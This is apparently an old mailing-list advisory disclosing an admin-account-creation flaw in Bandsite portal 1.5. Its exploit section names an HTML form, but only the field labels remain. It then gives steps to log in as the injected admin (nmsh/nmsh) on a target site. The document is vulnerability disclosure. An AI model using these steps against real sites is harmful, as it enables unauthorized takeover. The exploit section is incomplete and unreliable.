Informations : °°°°°°°°°°°°°° - Product : Bandsite portal system - Website : http://membres.lycos.fr/fluxx/bandwebsite.php - Author : Jelle de Vos - Tested version :1.5 - Problem : vulnerability in Bandsite Allows Gaining Admin Access. Product Description : °°°°°°°°°°°°°°°°°°°°° Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more. Exploits : °°°°°°°°°° ===================== nmsh.htm ==============================
 

Name:

Pass:



===================== nmsh.htm ============================== The admin has been added! :( now go to this link : http://[target]/bandwebsite/login.php and login as admin name : nmsh pass : nmsh Vendor: °°°°°°° Vendor has been contacted, no reply received. Provided by : °°°°°°°°°°°°° Nasser.M.Sh nmsh_sa(at)yahoo.com --------------------------------- Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software